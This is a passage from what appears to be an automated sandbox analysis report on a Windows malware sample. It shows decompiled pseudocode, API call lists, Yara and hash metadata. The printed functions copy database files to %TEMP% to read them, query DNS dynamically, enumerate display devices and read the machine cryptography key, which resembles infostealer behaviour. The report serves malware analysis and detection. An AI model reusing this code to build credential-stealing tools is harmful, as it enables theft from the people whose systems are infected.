                                                                                                                                                                                              				E0040781C(_v8, _t154,  &_v40, _t195);
                                                                                                                                                                                              				E004062D8(L"%TEMP%",  &_v60, _t195);
                                                                                                                                                                                              				_push(_v60);
                                                                                                                                                                                              				_push(E00410E58);
                                                                                                                                                                                              				_push(_v32);
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E0040781C(_v56, _t154,  &_v44, _t195);
                                                                                                                                                                                              				_t77 = E00403D3C(_v44);
                                                                                                                                                                                              				CopyFileW(E00403D3C(_v40), _t77, 0xffffffff);
                                                                                                                                                                                              				E0040377C( &_v64, _v44);
                                                                                                                                                                                              				E00404AFC(_v64, _t154, _t155,  &_v36, _t187, _t195);
                                                                                                                                                                                              				E00403D2C( &_v68, _v36);
                                                                                                                                                                                              				if(E004076B0(_v68, _t154, _t155) != 0) {
                                                                                                                                                                                              					_t92 =  *0x41b55c; // 0x41c784
                                                                                                                                                                                              					_t94 =  *((intOrPtr*)( *_t92))(E00403990(_v36),  &_v16);
                                                                                                                                                                                              					_t191 = _t190 + 8;
                                                                                                                                                                                              					__eflags = _t94;
                                                                                                                                                                                              					if(_t94 == 0) {
                                                                                                                                                                                              						E00408120(0x65,  &_v72);
                                                                                                                                                                                              						_t133 =  *0x41b5cc; // 0x41c78c
                                                                                                                                                                                              						_t135 =  *((intOrPtr*)( *_t133))(_v16, E00403990(_v72), 0xffffffff,  &_v20,  &_v24);
                                                                                                                                                                                              						_t192 = _t191 + 0x14;
                                                                                                                                                                                              						__eflags = _t135;
                                                                                                                                                                                              						if(_t135 == 0) {
                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                              								_t137 =  *0x41b600; // 0x41c790
                                                                                                                                                                                              								_t139 =  *((intOrPtr*)( *_t137))(_v20);
                                                                                                                                                                                              								__eflags = _t139 - 0x64;
                                                                                                                                                                                              								if(_t139 != 0x64) {
                                                                                                                                                                                              									goto L10;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t141 =  *0x41b588; // 0x41c794
                                                                                                                                                                                              								E00403C98( &_v76,  *((intOrPtr*)( *_t141))(_v20, 0, _v28));
                                                                                                                                                                                              								_t147 =  *0x41b588; // 0x41c794
                                                                                                                                                                                              								_t149 =  *((intOrPtr*)( *_t147))(_v20, 1, E00410E60, _v76);
                                                                                                                                                                                              								_t192 = _t192 + 0x10;
                                                                                                                                                                                              								E00403C98( &_v80, _t149);
                                                                                                                                                                                              								_push(_v80);
                                                                                                                                                                                              								_push(E00410E68);
                                                                                                                                                                                              								E00403E1C();
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					L10:
                                                                                                                                                                                              					_t96 =  *0x41b654; // 0x41c79c
                                                                                                                                                                                              					 *((intOrPtr*)( *_t96))(_v20);
                                                                                                                                                                                              					_t100 =  *0x41b590; // 0x41c788
                                                                                                                                                                                              					 *((intOrPtr*)( *_t100))(_v16);
                                                                                                                                                                                              					_pop(_t175);
                                                                                                                                                                                              					 *[fs:eax] = _t175;
                                                                                                                                                                                              					E00403BBC(_v12, _v28);
                                                                                                                                                                                              					DeleteFileW(E00403D3C(_v44));
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_pop(_t185);
                                                                                                                                                                                              					 *[fs:eax] = _t185;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_pop(_t177);
                                                                                                                                                                                              				 *[fs:eax] = _t177;
                                                                                                                                                                                              				_push(E00410E27);
                                                                                                                                                                                              				E00403B98( &_v80, 2);
                                                                                                                                                                                              				E004034E4( &_v72);
                                                                                                                                                                                              				E00403B80( &_v68);
                                                                                                                                                                                              				E004034E4( &_v64);
                                                                                                                                                                                              				E00403B98( &_v60, 6);
                                                                                                                                                                                              				E004034E4( &_v36);
                                                                                                                                                                                              				E00403B98( &_v32, 2);
                                                                                                                                                                                              				return E00403B80( &_v8);
                                                                                                                                                                                              			}











































                                                                                                                                                                                              0x00410c15
                                                                                                                                                                                              0x00410c18
                                                                                                                                                                                              0x00410c25
                                                                                                                                                                                              0x00410c30
                                                                                                                                                                                              0x00410c3d
                                                                                                                                                                                              0x00410c42
                                                                                                                                                                                              0x00410c45
                                                                                                                                                                                              0x00410c4a
                                                                                                                                                                                              0x00410c55
                                                                                                                                                                                              0x00410c60
                                                                                                                                                                                              0x00410c6a
                                                                                                                                                                                              0x00410c79
                                                                                                                                                                                              0x00410c84
                                                                                                                                                                                              0x00410c8f
                                                                                                                                                                                              0x00410c9a
                                                                                                                                                                                              0x00410ca9
                                                                                                                                                                                              0x00410cc5
                                                                                                                                                                                              0x00410ccc
                                                                                                                                                                                              0x00410cce
                                                                                                                                                                                              0x00410cd1
                                                                                                                                                                                              0x00410cd3
                                                                                                                                                                                              0x00410ceb
                                                                                                                                                                                              0x00410cfd
                                                                                                                                                                                              0x00410d04
                                                                                                                                                                                              0x00410d06
                                                                                                                                                                                              0x00410d09
                                                                                                                                                                                              0x00410d0b
                                                                                                                                                                                              0x00410d67
                                                                                                                                                                                              0x00410d6b
                                                                                                                                                                                              0x00410d72
                                                                                                                                                                                              0x00410d75
                                                                                                                                                                                              0x00410d78
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00410d18
                                                                                                                                                                                              0x00410d29
                                                                                                                                                                                              0x00410d3c
                                                                                                                                                                                              0x00410d43
                                                                                                                                                                                              0x00410d45
                                                                                                                                                                                              0x00410d4d
                                                                                                                                                                                              0x00410d52
                                                                                                                                                                                              0x00410d55
                                                                                                                                                                                              0x00410d62
                                                                                                                                                                                              0x00410d62
                                                                                                                                                                                              0x00410d67
                                                                                                                                                                                              0x00410d0b
                                                                                                                                                                                              0x00410d7a
                                                                                                                                                                                              0x00410d7e
                                                                                                                                                                                              0x00410d85
                                                                                                                                                                                              0x00410d8c
                                                                                                                                                                                              0x00410d93
                                                                                                                                                                                              0x00410d98
                                                                                                                                                                                              0x00410d9b
                                                                                                                                                                                              0x00410db0
                                                                                                                                                                                              0x00410dbe
                                                                                                                                                                                              0x00410cab
                                                                                                                                                                                              0x00410cad
                                                                                                                                                                                              0x00410cb0
                                                                                                                                                                                              0x00410cb0
                                                                                                                                                                                              0x00410dc5
                                                                                                                                                                                              0x00410dc8
                                                                                                                                                                                              0x00410dcb
                                                                                                                                                                                              0x00410dd8
                                                                                                                                                                                              0x00410de0
                                                                                                                                                                                              0x00410de8
                                                                                                                                                                                              0x00410df0
                                                                                                                                                                                              0x00410dfd
                                                                                                                                                                                              0x00410e05
                                                                                                                                                                                              0x00410e12
                                                                                                                                                                                              0x00410e1f

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00410BFD
                                                                                                                                                                                              • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CopyCountFileTick
                                                                                                                                                                                              • String ID: %TEMP%$.tmp
                                                                                                                                                                                              • API String ID: 3448371392-3650661790
                                                                                                                                                                                              • Opcode ID: 7e65eb29c14a11400a8ae9f9535f570905a72362550addcf7d14f60cf147a02b
                                                                                                                                                                                              • Instruction ID: ab4a798e1dfa23648b03a2b2561a2af29de01fabf162149de749457abe37d48b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e65eb29c14a11400a8ae9f9535f570905a72362550addcf7d14f60cf147a02b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 37411331910109AEDB01FF92D952ADDBBBDEF48318F50447BF400B3292D77DAE458A58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 69%
                                                                                                                                                                                              			E0040DDB0(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                              				void* _t29;
                                                                                                                                                                                              				void* _t40;
                                                                                                                                                                                              				WCHAR* _t51;
                                                                                                                                                                                              				int _t54;
                                                                                                                                                                                              				void* _t59;
                                                                                                                                                                                              				intOrPtr _t63;
                                                                                                                                                                                              				intOrPtr _t64;
                                                                                                                                                                                              				void* _t73;
                                                                                                                                                                                              				void* _t74;
                                                                                                                                                                                              				intOrPtr _t77;
                                                                                                                                                                                              				void* _t78;
                                                                                                                                                                                              				void* _t79;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t74 = __esi;
                                                                                                                                                                                              				_t73 = __edi;
                                                                                                                                                                                              				_t63 = __edx;
                                                                                                                                                                                              				_t59 = __ebx;
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                              				_v8 = __eax;
                                                                                                                                                                                              				E004040F4( &_v8);
                                                                                                                                                                                              				E00403980(_v12);
                                                                                                                                                                                              				_push(_t77);
                                                                                                                                                                                              				_push(0x40deaf);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t77;
                                                                                                                                                                                              				_t29 = E00403790(_v16);
                                                                                                                                                                                              				asm("cdq");
                                                                                                                                                                                              				_t78 = _t63 -  *0x41c82c; // 0x0
                                                                                                                                                                                              				if(_t78 != 0) {
                                                                                                                                                                                              					if(__eflags < 0) {
                                                                                                                                                                                              						goto L4;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t79 = _t29 -  *0x41c828; // 0x0
                                                                                                                                                                                              					if(_t79 < 0) {
                                                                                                                                                                                              						L4:
                                                                                                                                                                                              						E00407168(_v8, _t59,  &_v16);
                                                                                                                                                                                              						_t40 = E00403790(_v16);
                                                                                                                                                                                              						_t80 = _t40;
                                                                                                                                                                                              						if(_t40 == 0) {
                                                                                                                                                                                              							_t9 =  &_v20; // 0x414c4c
                                                                                                                                                                                              							E004062D8(L"%TEMP%\\curbuf.dat", _t9, _t80);
                                                                                                                                                                                              							_t10 =  &_v20; // 0x414c4c
                                                                                                                                                                                              							_t51 = E00403D3C( *_t10);
                                                                                                                                                                                              							_t54 = CopyFileW(E00403D3C(_v8), _t51, 0);
                                                                                                                                                                                              							_t81 = _t54;
                                                                                                                                                                                              							if(_t54 != 0) {
                                                                                                                                                                                              								E004062D8(L"%TEMP%\\curbuf.dat",  &_v24, _t81);
                                                                                                                                                                                              								E00407168(_v24, _t59,  &_v16);
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						E0040DCE8(_v16, _t59, _v12, _t73, _t74);
                                                                                                                                                                                              						E004062D8(L"%TEMP%\\curbuf.dat",  &_v28, _t81);
                                                                                                                                                                                              						DeleteFileW(E00403D3C(_v28));
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_pop(_t64);
                                                                                                                                                                                              				 *[fs:eax] = _t64;
                                                                                                                                                                                              				_push(E0040DEB6);
                                                                                                                                                                                              				E00403B98( &_v28, 3);
                                                                                                                                                                                              				E00403508( &_v16, 2);
                                                                                                                                                                                              				return E00403B80( &_v8);
                                                                                                                                                                                              			}






















                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                                                                                                                                              • CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,0040DEAF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004148F8,00000001,00414C4C), ref: 0040DE38
                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000,00000000,0040DEAF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004148F8,00000001,00414C4C,00000001,?), ref: 0040DE7A
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$AllocCopyDeleteString
                                                                                                                                                                                              • String ID: %TEMP%\curbuf.dat$LLA
                                                                                                                                                                                              • API String ID: 5292005-3909751444
                                                                                                                                                                                              • Opcode ID: 03760eacd4bf6eafee70f4f711e65bc97b6305d2d94ef0ca2e56f12b63379ea2
                                                                                                                                                                                              • Instruction ID: d3139e3bb668dcd489f787ebceafddff3eb8ed9e6fe86914fc70b8a9fa006da4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 03760eacd4bf6eafee70f4f711e65bc97b6305d2d94ef0ca2e56f12b63379ea2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E21FC74D10509ABDB00FBE5C88299EB7B9AF54305F50857BF400B72D2D738AE058A99
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 36%
                                                                                                                                                                                              			E00417E78(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				intOrPtr _v117;
                                                                                                                                                                                              				void* _t16;
                                                                                                                                                                                              				intOrPtr* _t37;
                                                                                                                                                                                              				intOrPtr _t41;
                                                                                                                                                                                              				intOrPtr* _t46;
                                                                                                                                                                                              				void* _t49;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t16 = __eax +  *__eax;
                                                                                                                                                                                              				 *_t16 =  *_t16 + _t16;
                                                                                                                                                                                              				 *[cs:eax] =  *[cs:eax] + _t16;
                                                                                                                                                                                              				_v117 = _v117 + __edx;
                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                              				_v8 = _t16;
                                                                                                                                                                                              				E00403980(_v8);
                                                                                                                                                                                              				_push(_t49);
                                                                                                                                                                                              				_push(0x417f22);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t49 + 0xfffffff4;
                                                                                                                                                                                              				_t46 = GetProcAddress(LoadLibraryA("dnsapi.dll"), "DnsQuery_A");
                                                                                                                                                                                              				if(_t46 != 0) {
                                                                                                                                                                                              					_v16 = 0;
                                                                                                                                                                                              					_t37 = E00402530(0x30);
                                                                                                                                                                                              					_v16 = E00402530(0x48);
                                                                                                                                                                                              					 *_t37 = 1;
                                                                                                                                                                                              					 *((intOrPtr*)(_t37 + 4)) = _v12;
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push( &_v16);
                                                                                                                                                                                              					_push(_t37);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(1);
                                                                                                                                                                                              					_push(E00403990(_v8));
                                                                                                                                                                                              					if( *_t46() == 0) {
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_pop(_t41);
                                                                                                                                                                                              				 *[fs:eax] = _t41;
                                                                                                                                                                                              				_push(E00417F29);
                                                                                                                                                                                              				return E004034E4( &_v8);
                                                                                                                                                                                              			}












                                                                                                                                                                                              0x00417f04
                                                                                                                                                                                              0x00417f04
                                                                                                                                                                                              0x00417f04
                                                                                                                                                                                              0x00417f0e
                                                                                                                                                                                              0x00417f11
                                                                                                                                                                                              0x00417f14
                                                                                                                                                                                              0x00417f21

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                                              • String ID: DnsQuery_A$dnsapi.dll
                                                                                                                                                                                              • API String ID: 2574300362-3847274415
                                                                                                                                                                                              • Opcode ID: 724cfed19cb1d21381234b51a37364b79d38ba7da5abfef29c6bd78e431c9a57
                                                                                                                                                                                              • Instruction ID: ee02e28701cd333fe80aa916ff0e932040e536dc5bff3800914b034e455f76c5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 724cfed19cb1d21381234b51a37364b79d38ba7da5abfef29c6bd78e431c9a57
                                                                                                                                                                                              • Instruction Fuzzy Hash: A9115E71A08304AED711DBA9CC52B9EBBB8DB45704F5140A7E504E72D2D6789E018B58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 33%
                                                                                                                                                                                              			E00417E7C(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				intOrPtr _v117;
                                                                                                                                                                                              				intOrPtr* _t36;
                                                                                                                                                                                              				intOrPtr _t40;
                                                                                                                                                                                              				intOrPtr* _t45;
                                                                                                                                                                                              				void* _t48;
                                                                                                                                                                                              
                                                                                                                                                                                              				 *[cs:eax] =  *[cs:eax] + __eax;
                                                                                                                                                                                              				_v117 = _v117 + __edx;
                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                              				_v8 = __eax;
                                                                                                                                                                                              				E00403980(_v8);
                                                                                                                                                                                              				_push(_t48);
                                                                                                                                                                                              				_push(0x417f22);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t48 + 0xfffffff4;
                                                                                                                                                                                              				_t45 = GetProcAddress(LoadLibraryA("dnsapi.dll"), "DnsQuery_A");
                                                                                                                                                                                              				if(_t45 != 0) {
                                                                                                                                                                                              					_v16 = 0;
                                                                                                                                                                                              					_t36 = E00402530(0x30);
                                                                                                                                                                                              					_v16 = E00402530(0x48);
                                                                                                                                                                                              					 *_t36 = 1;
                                                                                                                                                                                              					 *((intOrPtr*)(_t36 + 4)) = _v12;
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push( &_v16);
                                                                                                                                                                                              					_push(_t36);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(1);
                                                                                                                                                                                              					_push(E00403990(_v8));
                                                                                                                                                                                              					if( *_t45() == 0) {
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_pop(_t40);
                                                                                                                                                                                              				 *[fs:eax] = _t40;
                                                                                                                                                                                              				_push(E00417F29);
                                                                                                                                                                                              				return E004034E4( &_v8);
                                                                                                                                                                                              			}












                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                                              • String ID: DnsQuery_A$dnsapi.dll
                                                                                                                                                                                              • API String ID: 2574300362-3847274415
                                                                                                                                                                                              • Opcode ID: 50f0b7069414203643d559ff8c1b4067f618f2f1807c4d8d96e87e961dc54617
                                                                                                                                                                                              • Instruction ID: 3ed38bd560de987a20526e09c97c4f2d359d7c1ce2b9a36b0a47fbdadc566110
                                                                                                                                                                                              • Opcode Fuzzy Hash: 50f0b7069414203643d559ff8c1b4067f618f2f1807c4d8d96e87e961dc54617
                                                                                                                                                                                              • Instruction Fuzzy Hash: 48113D71A08304AEDB11DBA9CD52B9EBBB8DB44714F5140BBF904E73D1D6789E018B58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 32%
                                                                                                                                                                                              			E00416644(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                                                                                                                                                                                              				_Unknown_base(*)()* _v8;
                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                              				char _v336;
                                                                                                                                                                                              				char _v340;
                                                                                                                                                                                              				char _v344;
                                                                                                                                                                                              				void* _t31;
                                                                                                                                                                                              				intOrPtr _t39;
                                                                                                                                                                                              				intOrPtr* _t43;
                                                                                                                                                                                              				void* _t46;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v340 = 0;
                                                                                                                                                                                              				_v344 = 0;
                                                                                                                                                                                              				_t43 = __eax;
                                                                                                                                                                                              				_push(_t46);
                                                                                                                                                                                              				_push(0x41670d);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t46 + 0xfffffeac;
                                                                                                                                                                                              				_v8 = GetProcAddress(LoadLibraryA("user32.dll"), "EnumDisplayDevicesW");
                                                                                                                                                                                              				_v336 = 0x148;
                                                                                                                                                                                              				_t31 = 0;
                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push( &_v336);
                                                                                                                                                                                              					_push(_t31);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					if(_v8() == 0) {
                                                                                                                                                                                              						break;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t31 = _t31 + 1;
                                                                                                                                                                                              					_push( *_t43);
                                                                                                                                                                                              					E00403D10( &_v344, 0x80,  &_v268);
                                                                                                                                                                                              					E0040377C( &_v340, _v344);
                                                                                                                                                                                              					_push(_v340);
                                                                                                                                                                                              					_push(E00416744);
                                                                                                                                                                                              					E00403850();
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_pop(_t39);
                                                                                                                                                                                              				 *[fs:eax] = _t39;
                                                                                                                                                                                              				_push(E00416714);
                                                                                                                                                                                              				E00403B80( &_v344);
                                                                                                                                                                                              				return E004034E4( &_v340);
                                                                                                                                                                                              			}













                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(user32.dll,EnumDisplayDevicesW,00000000,0041670D,?,-00000001,0041B0FC,?,?,00416863,Video Info,?,004169AC,?,GetRAM: ,?), ref: 00416678
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0041667E
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                                              • String ID: EnumDisplayDevicesW$user32.dll
                                                                                                                                                                                              • API String ID: 2574300362-1693391355
                                                                                                                                                                                              • Opcode ID: be31b090cf9e22f53fe63a2b9ccc94bb75e49f076f039a93db071de62ba29d85
                                                                                                                                                                                              • Instruction ID: bffb8a391e8cbf63d1c0eded9315efc20e69fe0ee1e689c0aa8ff6c2638661ea
                                                                                                                                                                                              • Opcode Fuzzy Hash: be31b090cf9e22f53fe63a2b9ccc94bb75e49f076f039a93db071de62ba29d85
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E118970500618AFDB61EF61CC45BDABBBCEF84709F1140FAE508A6291D6789E848E58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 29%
                                                                                                                                                                                              			E00417E80(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				intOrPtr* _t34;
                                                                                                                                                                                              				intOrPtr _t38;
                                                                                                                                                                                              				intOrPtr* _t43;
                                                                                                                                                                                              				void* _t46;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                              				_v8 = __eax;
                                                                                                                                                                                              				E00403980(_v8);
                                                                                                                                                                                              				_push(_t46);
                                                                                                                                                                                              				_push(0x417f22);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t46 + 0xfffffff4;
                                                                                                                                                                                              				_t43 = GetProcAddress(LoadLibraryA("dnsapi.dll"), "DnsQuery_A");
                                                                                                                                                                                              				if(_t43 != 0) {
                                                                                                                                                                                              					_v16 = 0;
                                                                                                                                                                                              					_t34 = E00402530(0x30);
                                                                                                                                                                                              					_v16 = E00402530(0x48);
                                                                                                                                                                                              					 *_t34 = 1;
                                                                                                                                                                                              					 *((intOrPtr*)(_t34 + 4)) = _v12;
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push( &_v16);
                                                                                                                                                                                              					_push(_t34);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(1);
                                                                                                                                                                                              					_push(E00403990(_v8));
                                                                                                                                                                                              					if( *_t43() == 0) {
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_pop(_t38);
                                                                                                                                                                                              				 *[fs:eax] = _t38;
                                                                                                                                                                                              				_push(E00417F29);
                                                                                                                                                                                              				return E004034E4( &_v8);
                                                                                                                                                                                              			}











                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                                              • String ID: DnsQuery_A$dnsapi.dll
                                                                                                                                                                                              • API String ID: 2574300362-3847274415
                                                                                                                                                                                              • Opcode ID: a19d4597b475aaa9ac328eaf6b87c7589b0a3e1b2296b7586c6c4fb46158065e
                                                                                                                                                                                              • Instruction ID: 92d1eb556667ed81b8552bf9075b82756b3340621e6324b7cba7be93811987cb
                                                                                                                                                                                              • Opcode Fuzzy Hash: a19d4597b475aaa9ac328eaf6b87c7589b0a3e1b2296b7586c6c4fb46158065e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 20111CB1A04304AED751DBAACD42B9FBBF8EB48714F5140B6F904E73C1E678DE418A58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 71%
                                                                                                                                                                                              			E0040246C(intOrPtr __eax, void* __edx) {
                                                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                                                              				void* __ecx;
                                                                                                                                                                                              				void* __ebp;
                                                                                                                                                                                              				intOrPtr _t25;
                                                                                                                                                                                              				intOrPtr _t36;
                                                                                                                                                                                              				intOrPtr _t39;
                                                                                                                                                                                              				void* _t42;
                                                                                                                                                                                              				intOrPtr _t45;
                                                                                                                                                                                              				intOrPtr _t47;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t45 = _t47;
                                                                                                                                                                                              				_t42 = __edx;
                                                                                                                                                                                              				_t25 = __eax;
                                                                                                                                                                                              				if( *0x41c5ac != 0 || E00401870() != 0) {
                                                                                                                                                                                              					_push(_t45);
                                                                                                                                                                                              					_push("�^");
                                                                                                                                                                                              					_push( *[fs:edx]);
                                                                                                                                                                                              					 *[fs:edx] = _t47;
                                                                                                                                                                                              					if( *0x41c035 != 0) {
                                                                                                                                                                                              						_push(0x41c5b4);
                                                                                                                                                                                              						L004011CC();
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if(E00402290(_t25, _t42) == 0) {
                                                                                                                                                                                              						_t39 = E00401F5C(_t42);
                                                                                                                                                                                              						_t15 = ( *(_t25 - 4) & 0x7ffffffc) - 4;
                                                                                                                                                                                              						if(_t42 < ( *(_t25 - 4) & 0x7ffffffc) - 4) {
                                                                                                                                                                                              							_t15 = _t42;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_t39 != 0) {
                                                                                                                                                                                              							E00402628(_t25, _t15, _t39);
                                                                                                                                                                                              							E004020EC(_t25);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_v8 = _t39;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_v8 = _t25;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_pop(_t36);
                                                                                                                                                                                              					 *[fs:eax] = _t36;
                                                                                                                                                                                              					_push(E00402524);
                                                                                                                                                                                              					if( *0x41c035 != 0) {
                                                                                                                                                                                              						_push(0x41c5b4);
                                                                                                                                                                                              						L004011D4();
                                                                                                                                                                                              						return 0;
